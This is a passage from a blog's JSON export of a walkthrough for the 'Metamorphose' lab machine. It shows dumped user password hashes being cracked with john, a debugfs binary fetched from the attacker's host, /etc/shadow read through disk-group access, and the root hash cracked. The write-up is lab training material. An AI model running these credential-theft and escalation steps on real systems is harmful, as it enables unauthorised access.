&quot;b460021a7bb42c159a2382a9b1f73944b292bf9748f3a063c5e6a2b73db7ba53&quot;, &quot;email&quot;: &quot;angeline@metamorphose.hmv&quot;, &quot;role&quot;: &quot;user&quot;}\nnull-{&quot;username&quot;: &quot;sheridan&quot;, &quot;password&quot;: &quot;8717128e8774950dc2e58f899bbab4a4ba91fe34ac564d00ec4006169fa0fcc5&quot;, &quot;email&quot;: &quot;sheridan@metamorphose.hmv&quot;, &quot;role&quot;: &quot;admin&quot;}\nnull-{&quot;username&quot;: &quot;reid&quot;, &quot;password&quot;: &quot;a0d1968ca7d8580f53b3b65775a7e126e1d4f6054d396f47ede1e65893d653b3&quot;, &quot;email&quot;: &quot;reid@metamorphose.hmv&quot;, &quot;role&quot;: &quot;editor&quot;}\nnull-{&quot;username&quot;: &quot;asher&quot;, &quot;password&quot;: &quot;1f8642763371ca486ff7a5df412fa8c98abac2371032f35835d15dbdf80cab70&quot;, &quot;email&quot;: &quot;asher@metamorphose.hmv&quot;, &quot;role&quot;: &quot;editor&quot;}\nnull-{&quot;username&quot;: &quot;lakyn&quot;, &quot;password&quot;: &quot;2ac9ee0d8724e344fd8b53b13183e8d66a6ba492b8f52960ef90ddb3c369128a&quot;, &quot;email&quot;: &quot;lakyn@metamorphose.hmv&quot;, &quot;role&quot;: &quot;user&quot;}\nnull-{&quot;username&quot;: &quot;aviva&quot;, &quot;password&quot;: &quot;9daa3d43959547cb632bd9234454ac4a655b1b56d2bcee35d72e9121c0e82768&quot;, &quot;email&quot;: &quot;aviva@metamorphose.hmv&quot;, &quot;role&quot;: &quot;user&quot;}\nnull-{&quot;username&quot;: &quot;chabane&quot;, &quot;password&quot;: &quot;966c4d1242e3c0003d6941ef1a202998ec3b48370728e40505096bfb54039e55&quot;, &quot;email&quot;: &quot;chabane@metamorphose.hmv&quot;, &quot;role&quot;: &quot;admin&quot;}\n^CProcessed a total of 32 messages<\/code><\/pre>\n<p>Extract the relevant fields, then crack the hashes:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose]\n\u2514\u2500$ cat text | awk -F &#039;[&quot;]&#039; &#039;{print $4}&#039; &gt; user                        
               \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose]\n\u2514\u2500$ cat text | awk -F &#039;[&quot;]&#039; &#039;{print $8}&#039; &gt; pass\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose]\n\u2514\u2500$ paste user pass                                 \nroot    e2f7a3617512ed81aa68c7be9c435609cfb513b021ce07ee9d2759f08f4d9054\nsaman   5b5ba511537a7871212f7a978f708aef60a02b80e77ed14dcc59cbd019d6791d\nmichele 77e19ed98cf4b945e9034efb30779abd21c70a7b4e3b0ae92ab50db9ca39a75b\noleesa  f44609c0c1fe331267c8fe1069f4b67fd67ff95fb9742eede4ec9028fa770bdd\nsarene  2f15dacafe7b70bfa88d07d15026cdd40799264c36c120e34a28e7659b6a928d\njanella bc5219396bb2a0de2e0776ad1078f67c417da95d5e009989d7d4ea14823bfb5a\nbronson a0ef680b09d2f9821d69416d6c5629d3f109751c0fc3a77592041644e268a65e\nvonda   b1d83b7991c7a2286abfc2ba555e426a4dd7db4072815f71e3ec45406ab8dd7d\ntoshinari       5018f7be54a3f684bb01b2d21e293a423f5978da36e19c86abc085d9514b56d2\nlaurie  597f3fdd0ba9d4af8699dc30e4d1c8c74551e10a56eaad108d34b28ac8d353c7\nalia    d2e5eda5bf734608f1585adffc30846340878e0ab1f0be572ac79f88ac4c808e\nraj     3a76752b3c949f0bdaed819d0f61ae6ca863e5235062a004b23e65059cae6fdd\narleen  aaf6946a8e02f31cc9542a0bb1cfa6dd49ccd01d57802417a28cf493ad7ff5ad\nmelbourne       a08aa555a5e5b7a73125cf367176ce446eb1d0c07a068077ab4f740a8fded545\ncarolyn 544c4de6388bf397d905015b085ee359f3813550912467bed347e666d35a1fee\ncoralie 9bf4bc753cfb7e1abafb74ec6e3e22e7d47622d2f39a2652b405d34fd50f023e\nfarhad  157e2743e9edc74a954fc6cfa82f77801b66781091955cf0284f0e3819d51dfc\nfelix   3fe0e7fbd33d9ca82f77d1a0c2ff4c28b0d35b8024c61a05bd244ccc28d53816\nchase   e387178e3c60967aadc8e8a795a819d24493c05e2d999e56bf01d08654ef80d2\nblakeley        7cd774b3d7a0d7e8696b0cab072c0cc50dd7ab2ac3db362ebe2cd154a3505b78\nrisa    9dee3c618985708c50c53854751297a10abc8b02e9f416137816fc408145a6b3\npaddy   d24214a379e0a1115185de1415c0c38f9a90803f1188fb366506eb96b219b838\nmin     
c84ef95012d8f8baa4d62b1ea791c158a5daa7f82f611b2b33d344cb14779ceb\nezmeralda       362d8c0d990e1f8583047fbb0114691e2716a0f11d751ce29604611a7e38275d\nlita    dd3e6e2665d0f27ecce3a7e017c4d7656ad8e5a78d9d40d21bc044cf96097d66\nangeline        b460021a7bb42c159a2382a9b1f73944b292bf9748f3a063c5e6a2b73db7ba53\nsheridan        8717128e8774950dc2e58f899bbab4a4ba91fe34ac564d00ec4006169fa0fcc5\nreid    a0d1968ca7d8580f53b3b65775a7e126e1d4f6054d396f47ede1e65893d653b3\nasher   1f8642763371ca486ff7a5df412fa8c98abac2371032f35835d15dbdf80cab70\nlakyn   2ac9ee0d8724e344fd8b53b13183e8d66a6ba492b8f52960ef90ddb3c369128a\naviva   9daa3d43959547cb632bd9234454ac4a655b1b56d2bcee35d72e9121c0e82768\nchabane 966c4d1242e3c0003d6941ef1a202998ec3b48370728e40505096bfb54039e5<\/code><\/pre>\n<p>Before cracking all of them, first check which of these users actually exist on the machine:<\/p>\n<pre><code class=\"language-bash\">(remote) melbourne@metamorphose.hmv:\/home$ ls -la\ntotal 276\ndrwxr-xr-x  4 root      root        4096 Feb 26 17:14 .\ndrwxr-xr-x 18 root      root      266240 May 28 11:22 ..\ndrwx------  2 coralie   coralie     4096 Feb 26 17:32 coralie\ndrwx------  3 melbourne melbourne   4096 Feb 26 17:32 melbourne\n(remote) melbourne@metamorphose.hmv:\/home$ cat \/etc\/passwd | grep \/bin\nroot:x:0:0:root:\/root:\/bin\/bash\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nmelbourne:x:1000:1000:,,,:\/home\/melbourne:\/bin\/bash\ncoralie:x:1001:1001::\/home\/coralie:\/bin\/bash<\/code><\/pre>\n<p>Only <code>coralie<\/code> is interesting, so pull out that user&#039;s hash and crack it:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose]\n\u2514\u2500$ paste user pass | grep coralie\ncoralie 
9bf4bc753cfb7e1abafb74ec6e3e22e7d47622d2f39a2652b405d34fd50f023e\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose]\n\u2514\u2500$ john --wordlist=\/usr\/share\/wordlists\/rockyou.txt hash\nWarning: detected hash type &quot;cryptoSafe&quot;, but the string is also recognized as &quot;gost&quot;\nUse the &quot;--format=gost&quot; option to force loading these as that type instead\nWarning: detected hash type &quot;cryptoSafe&quot;, but the string is also recognized as &quot;HAVAL-256-3&quot;\nUse the &quot;--format=HAVAL-256-3&quot; option to force loading these as that type instead\nWarning: detected hash type &quot;cryptoSafe&quot;, but the string is also recognized as &quot;Panama&quot;\nUse the &quot;--format=Panama&quot; option to force loading these as that type instead\nWarning: detected hash type &quot;cryptoSafe&quot;, but the string is also recognized as &quot;po&quot;\nUse the &quot;--format=po&quot; option to force loading these as that type instead\nWarning: detected hash type &quot;cryptoSafe&quot;, but the string is also recognized as &quot;Raw-Keccak-256&quot;\nUse the &quot;--format=Raw-Keccak-256&quot; option to force loading these as that type instead\nWarning: detected hash type &quot;cryptoSafe&quot;, but the string is also recognized as &quot;Raw-SHA256&quot;\nUse the &quot;--format=Raw-SHA256&quot; option to force loading these as that type instead\nWarning: detected hash type &quot;cryptoSafe&quot;, but the string is also recognized as &quot;skein-256&quot;\nUse the &quot;--format=skein-256&quot; option to force loading these as that type instead\nWarning: detected hash type &quot;cryptoSafe&quot;, but the string is also recognized as &quot;Snefru-256&quot;\nUse the &quot;--format=Snefru-256&quot; option to force loading these as that type instead\nUsing default input encoding: UTF-8\nLoaded 1 password hash (cryptoSafe [AES-256-CBC])\nWill run 2 OpenMP threads\nPress &#039;q&#039; or Ctrl-C to abort, almost any other key for 
status\n0g 0:00:00:05 DONE (2024-08-05 12:17) 0g\/s 2476Kp\/s 2476Kc\/s 2476KC\/s 02102265315..*7\u00a1Vamos!\nSession completed. \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose]\n\u2514\u2500$ cat hash                                   \n9bf4bc753cfb7e1abafb74ec6e3e22e7d47622d2f39a2652b405d34fd50f023e\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose]\n\u2514\u2500$ hash-identifier                                                    \n   #########################################################################\n   #     __  __                     __           ______    _____           #\n   #    \/\\ \\\/\\ \\                   \/\\ \\         \/\\__  _\\  \/\\  _ `\\         #\n   #    \\ \\ \\_\\ \\     __      ____ \\ \\ \\___     \\\/_\/\\ \\\/  \\ \\ \\\/\\ \\        #\n   #     \\ \\  _  \\  \/&#039;__`\\   \/ ,__\\ \\ \\  _ `\\      \\ \\ \\   \\ \\ \\ \\ \\       #\n   #      \\ \\ \\ \\ \\\/\\ \\_\\ \\_\/\\__, `\\ \\ \\ \\ \\ \\      \\_\\ \\__ \\ \\ \\_\\ \\      #\n   #       \\ \\_\\ \\_\\ \\___ \\_\\\/\\____\/  \\ \\_\\ \\_\\     \/\\_____\\ \\ \\____\/      #\n   #        \\\/_\/\\\/_\/\\\/__\/\\\/_\/\\\/___\/    \\\/_\/\\\/_\/     \\\/_____\/  \\\/___\/  v1.2 #\n   #                                                             By Zion3R #\n   #                                                    www.Blackploit.com #\n   #                                                   Root@Blackploit.com #\n   #########################################################################\n--------------------------------------------------\n HASH: 9bf4bc753cfb7e1abafb74ec6e3e22e7d47622d2f39a2652b405d34fd50f023e\n\nPossible Hashs:\n[+] SHA-256\n[+] Haval-256\n\nLeast Possible Hashs:\n[+] GOST R 34.11-94\n[+] RipeMD-256\n[+] SNEFRU-256\n[+] SHA-256(HMAC)\n[+] Haval-256(HMAC)\n[+] RipeMD-256(HMAC)\n[+] SNEFRU-256(HMAC)\n[+] SHA-256(md5($pass))\n[+] SHA-256(sha1($pass))\n--------------------------------------------------\n HASH: ^C\n\n     
   Bye!\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose]\n\u2514\u2500$ john --list=formats | grep &quot;SHA-256&quot;\n414 formats (149 dynamic formats shown as just &quot;dynamic_n&quot; here)\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose]\n\u2514\u2500$ john --list=formats | grep &quot;256&quot;    \n414 formats (149 dynamic formats shown as just &quot;dynamic_n&quot; here)\ntripcode, AndroidBackup, adxcrypt, agilekeychain, aix-ssha1, aix-ssha256, \nsha256crypt, sha512crypt, Citrix_NS10, dahua, dashlane, diskcryptor, Django, \nelectrum, EncFS, enpass, EPI, EPiServer, ethereum, fde, Fortigate256, \nFortigate, FormSpring, FVDE, geli, gost, gpg, HAVAL-128-4, HAVAL-256-3, hdaa, \nPBKDF2-HMAC-SHA256, PBKDF2-HMAC-SHA512, PDF, PEM, pfx, pgpdisk, pgpsda, \nRaw-Blake2, Raw-Keccak, Raw-Keccak-256, Raw-MD4, Raw-MD5, Raw-MD5u, Raw-SHA1, \nRaw-SHA1-AxCrypt, Raw-SHA1-Linkedin, Raw-SHA224, Raw-SHA256, Raw-SHA3, \nskein-256, skein-512, skey, SL3, Snefru-128, Snefru-256, LastPass, SNMP, \nHMAC-SHA256, HMAC-SHA384, HMAC-SHA512, dummy, crypt\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose]\n\u2514\u2500$ john --wordlist=\/usr\/share\/wordlists\/rockyou.txt hash --format=Raw-SHA256 \nUsing default input encoding: UTF-8\nLoaded 1 password hash (Raw-SHA256 [SHA256 128\/128 SSE2 4x])\nWarning: poor OpenMP scalability for this hash type, consider --fork=2\nWill run 2 OpenMP threads\nPress &#039;q&#039; or Ctrl-C to abort, almost any other key for status\nmy2monkeys       (?)     
\n1g 0:00:00:00 DONE (2024-08-05 12:23) 7.142g\/s 2925Kp\/s 2925Kc\/s 2925KC\/s remmer..kevin56\nUse the &quot;--show --format=Raw-SHA256&quot; options to display all of the cracked passwords reliably\nSession completed.<\/code><\/pre>\n<h3>Extracting disk information<\/h3>\n<p>First, switch to that user:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408060058528.png\" alt=\"image-20240806002423533\" \/><\/p>\n<pre><code class=\"language-bash\">coralie@metamorphose:~$ sudo -l\nbash: sudo: command not found\ncoralie@metamorphose:~$ whoami;id\ncoralie\nuid=1001(coralie) gid=1001(coralie) groups=1001(coralie),6(disk)\ncoralie@metamorphose:~$ df -h\nFilesystem      Size  Used Avail Use% Mounted on\nudev            962M     0  962M   0% \/dev\ntmpfs           197M  548K  197M   1% \/run\n\/dev\/sda1        29G  4.4G   23G  16% \/\ntmpfs           984M     0  984M   0% \/dev\/shm\ntmpfs           5.0M     0  5.0M   0% \/run\/lock\ntmpfs           197M     0  197M   0% \/run\/user\/1001<\/code><\/pre>\n<p>There is a mounted disk, and <code>coralie<\/code> is a member of the <code>disk<\/code> group, which grants read access to the raw block device regardless of file permissions on the mounted filesystem. Let us see what is on it using <code>debugfs<\/code>:<\/p>\n<pre><code 
class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose]\n\u2514\u2500$ find \/ -name *debugfs* 2&gt;\/dev\/null\n\/usr\/share\/man\/man8\/debugfs.8.gz\n\/usr\/lib\/modules\/6.6.9-amd64\/kernel\/net\/l2tp\/l2tp_debugfs.ko.xz\n\/usr\/lib\/modules\/6.6.9-amd64\/kernel\/drivers\/platform\/chrome\/cros_ec_debugfs.ko.xz\n\/usr\/lib\/modules\/6.6.9-amd64\/kernel\/drivers\/platform\/chrome\/wilco_ec\/wilco_ec_debugfs.ko.xz\n\/usr\/sbin\/debugfs\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose]\n\u2514\u2500$ file \/usr\/sbin\/debugfs            \n\/usr\/sbin\/debugfs: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, BuildID[sha1]=24c03a9f2307079cfd9615f13399d74388a2a0db, for GNU\/Linux 3.2.0, stripped\n\ncoralie@metamorphose:\/tmp$ wget http:\/\/172.20.10.8:8888\/debugfs\n--2024-08-05 18:45:40--  http:\/\/172.20.10.8:8888\/debugfs\nConnecting to 172.20.10.8:8888... connected.\nHTTP request sent, awaiting response... 
200 OK\nLength: 243536 (238K) [application\/octet-stream]\nSaving to: \u2018debugfs\u2019\n\ndebugfs                                         100%[====================================================================================================&gt;] 237.83K  --.-KB\/s    in 0.004s  \n\n2024-08-05 18:45:40 (56.3 MB\/s) - \u2018debugfs\u2019 saved [243536\/243536]\n\ncoralie@metamorphose:\/tmp$ chmod +x debugfs \ncoralie@metamorphose:\/tmp$ df -h\nFilesystem      Size  Used Avail Use% Mounted on\nudev            962M     0  962M   0% \/dev\ntmpfs           197M  548K  197M   1% \/run\n\/dev\/sda1        29G  4.4G   23G  16% \/\ntmpfs           984M     0  984M   0% \/dev\/shm\ntmpfs           5.0M     0  5.0M   0% \/run\/lock\ntmpfs           197M     0  197M   0% \/run\/user\/1001\ncoralie@metamorphose:\/tmp$ .\/debugfs \/dev\/sda1\ndebugfs 1.47.0 (5-Feb-2023)\ndebugfs:  help\nAvailable debugfs requests:\n\nshow_debugfs_params, params\n                         Show debugfs parameters\nopen_filesys, open       Open a filesystem\nclose_filesys, close     Close the filesystem\nfreefrag, e2freefrag     Report free space fragmentation\nfeature, features        Set\/print superblock features\ndirty_filesys, dirty     Mark the filesystem as dirty\ninit_filesys             Initialize a filesystem (DESTROYS DATA)\nshow_super_stats, stats  Show superblock statistics\nncheck                   Do inode-&gt;name translation\nicheck                   Do block-&gt;inode translation\nchange_root_directory, chroot\n                         Change root directory\nchange_working_directory, cd\n                         Change working directory\nlist_directory, ls       List directory\nshow_inode_info, stat    Show inode information \ndump_extents, extents, ex\n                         Dump extents information \nblocks                   Dump blocks used by an inode \nfilefrag                 Report fragmentation information for an inode\nlink, ln                 Create directory 
link\nunlink                   Delete a directory link\nmkdir                    Create a directory\nrmdir                    Remove a directory\nrm                       Remove a file (unlink and kill_file, if appropriate)\nkill_file                Deallocate an inode and its blocks\ncopy_inode               Copy the inode structure\nclri                     Clear an inode&#039;s contents\nfreei                    Clear an inode&#039;s in-use flag\nseti                     Set an inode&#039;s in-use flag\ntesti                    Test an inode&#039;s in-use flag\nfreeb                    Clear a block&#039;s in-use flag\nsetb                     Set a block&#039;s in-use flag\ntestb                    Test a block&#039;s in-use flag\nmodify_inode, mi         Modify an inode by structure\nfind_free_block, ffb     Find free block(s)\nfind_free_inode, ffi     Find free inode(s)\nprint_working_directory, pwd\n                         Print current working directory\nexpand_dir, expand       Expand directory\nmknod                    Create a special file\nlist_deleted_inodes, lsdel\n                         List deleted inodes\nundelete, undel          Undelete file\nwrite                    Copy a file from your native filesystem\ndump_inode, dump         Dump an inode out to a file\ncat                      Dump an inode out to stdout\nlcd                      Change the current directory on your native filesystem\nrdump                    Recursively dump a directory to the native filesystem\nset_super_value, ssv     Set superblock value\nset_inode_field, sif     Set inode field\nset_block_group, set_bg  Set block group descriptor field\nlogdump                  Dump the contents of the journal\nhtree_dump, htree        Dump a hash-indexed directory\ndx_hash, hash            Calculate the directory hash of a filename\ndirsearch                Search a directory for a particular filename\nbmap                     Calculate the logical-&gt;physical block mapping for 
an inode\nfallocate                Allocate uninitialized blocks to an inode\npunch, truncate          Punch (or truncate) blocks from an inode by deallocating them\nsymlink                  Create a symbolic link\nimap                     Calculate the location of an inode\ndump_unused              Dump unused blocks\nset_current_time         Set current time to use when setting filesystem fields\nsupported_features       Print features supported by this version of e2fsprogs\ndump_mmp                 Dump MMP information\nset_mmp_value, smmp      Set MMP value\nextent_open, eo          Open inode for extent manipulation\nzap_block, zap           Zap block: fill with 0, pattern, flip bits etc.\nblock_dump, bdump, bd    Dump contents of a block\nea_list                  List extended attributes of an inode\nea_get                   Get an extended attribute of an inode\nea_set                   Set an extended attribute of an inode\nea_rm                    Remove an extended attribute of an inode\nlist_quota, lq           List quota\nget_quota, gq            Get quota\ninode_dump, idump, id    Dump the inode structure in hex\njournal_open, jo         Open the journal\njournal_close, jc        Close the journal\njournal_write, jw        Write a transaction to the journal\njournal_run, jr          Recover the journal\nhelp                     Display info on command or topic.\nlist_requests, lr, ?     
List available commands.\nquit, q                  Leave the subsystem.\n\ndebugfs:  cat \/etc\/shadow\nroot:$y$j9T$iAHGFf9E40kdt5eEY4R790$1Hnu3bkcGq69yrKAWBL9zuT1cLG16\/ENdKsxR1omAqB:19779:0:99999:7:::\ndaemon:*:19779:0:99999:7:::\nbin:*:19779:0:99999:7:::\nsys:*:19779:0:99999:7:::\nsync:*:19779:0:99999:7:::\ngames:*:19779:0:99999:7:::\nman:*:19779:0:99999:7:::\nlp:*:19779:0:99999:7:::\nmail:*:19779:0:99999:7:::\nnews:*:19779:0:99999:7:::\nuucp:*:19779:0:99999:7:::\nproxy:*:19779:0:99999:7:::\nwww-data:*:19779:0:99999:7:::\nbackup:*:19779:0:99999:7:::\nlist:*:19779:0:99999:7:::\nirc:*:19779:0:99999:7:::\n_apt:*:19779:0:99999:7:::\nnobody:*:19779:0:99999:7:::\nsystemd-network:!*:19779::::::\nsystemd-timesync:!*:19779::::::\nmessagebus:!:19779::::::\navahi-autoipd:!:19779::::::\nsshd:!:19779::::::\nntpsec:!:19779::::::\nepmd:!:19779::::::\nmelbourne:$y$j9T$9AW5vMwISGEth89TZdLQX.$3oxC.VAZ57n4S94eRdZzcsGbgIoiAxWTdCP7afTV7x2:19779:0:99999:7:::\ncoralie:$y$j9T$knJbyxpFrCvXDa\/DDdck\/1$GKzq8p7o9Qjurg6bzmM6TZtilp3qY8caDnkDYDJas35:19779:0:99999:7:::<\/code><\/pre>\n<p>Try cracking the root hash. It is yescrypt (<code>$y$<\/code> prefix), so john needs <code>--format=crypt<\/code> to hand it to the system crypt(3):<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose]\n\u2514\u2500$ cat passwd\nroot:x:0:0:root:\/root:\/bin\/bash\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose]\n\u2514\u2500$ cat shadow\nroot:$y$j9T$iAHGFf9E40kdt5eEY4R790$1Hnu3bkcGq69yrKAWBL9zuT1cLG16\/ENdKsxR1omAqB:19779:0:99999:7:::\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose]\n\u2514\u2500$ unshadow passwd shadow &gt; crack                        \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose]\n\u2514\u2500$ cat crack     \nroot:$y$j9T$iAHGFf9E40kdt5eEY4R790$1Hnu3bkcGq69yrKAWBL9zuT1cLG16\/ENdKsxR1omAqB:0:0:root:\/root:\/bin\/bash\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose]\n\u2514\u2500$ john --wordlist=\/usr\/share\/wordlists\/rockyou.txt crack --format=crypt\nUsing 
default input encoding: UTF-8\nLoaded 1 password hash (crypt, generic crypt(3) [?\/64])\nCost 1 (algorithm [1:descrypt 2:md5crypt 3:sunmd5 4:bcrypt 5:sha256crypt 6:sha512crypt]) is 0 for all loaded hashes\nCost 2 (algorithm specific iterations) is 1 for all loaded hashes\nWill run 2 OpenMP threads\nPress &#039;q&#039; or Ctrl-C to abort, almost any other key for status\nqazwsxedc        (root)     \n1g 0:00:00:11 DONE (2024-08-05 12:57) 0.08554g\/s 172.4p\/s 172.4c\/s 172.4C\/s amore..jesusfreak\nUse the &quot;--show&quot; option to display all of the cracked passwords reliably\nSession completed.<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408060058529.png\" alt=\"image-20240806005814286\" \/><\/p>\n<h2>References<\/h2>\n<p><a href=\"https:\/\/www.youtube.com\/watch?v=hWFoDmhdaws\">https:\/\/www.youtube.com\/watch?v=hWFoDmhdaws<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Metamorphose This box is hard; the experts in the group also spent a long time on it, unfortunately without much progress. Let us download it and take a look! &#038;quo 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-769","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/769","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=769"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/769\/revisions"}],"predecessor-version":[{"id":770,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/769\/revisions\/770"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=769"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=769"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=769"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}